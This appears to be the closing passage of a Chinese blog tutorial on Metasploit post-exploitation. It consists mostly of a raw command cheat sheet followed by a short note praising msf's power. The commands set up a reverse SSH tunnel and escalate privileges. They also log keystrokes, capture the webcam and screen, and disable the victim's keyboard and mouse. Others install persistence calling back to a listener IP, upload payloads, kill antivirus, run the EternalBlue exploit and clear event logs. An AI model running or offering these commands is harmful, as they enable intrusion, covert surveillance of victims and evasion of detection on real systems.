vi /etc/ssh/sshd_config && GatewayPorts:yes
ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 [email protected] -p 29402
[*]如果想要在docker启动持续监听可以用如下命令
set exitonsession false && run -j
migrate 1988 && getpid
getuid && sysinfo && getsystem
ifconfig && route
run vnc
keyscan_start && keyscan_dump
run persistence -U -i 10 -p 2333 192.168.43.153
run persistence -X -i 10 -p 2333 192.168.43.153
screenshot
idletime
uictl disable keyboard
uictl disable mouse
search -d c:\\ -f payload.exe
dowmload c:\\Users\\root\\Desktop\\payload.exe /root/Desktop
upload /root/Desktop/hack.jpeg c:\\Users\\root\\Desktop\\payload.exe
webcam_snap
run post/multi/recon/local_exploit_suggester
set payload windows/vncinject/reverse_tcp
set viewonly no
killav
run post/windows/gather/enum_ie
route add 92.168.43.150 255.255.255.0 3
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue
clearev
0x03. 结语
msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!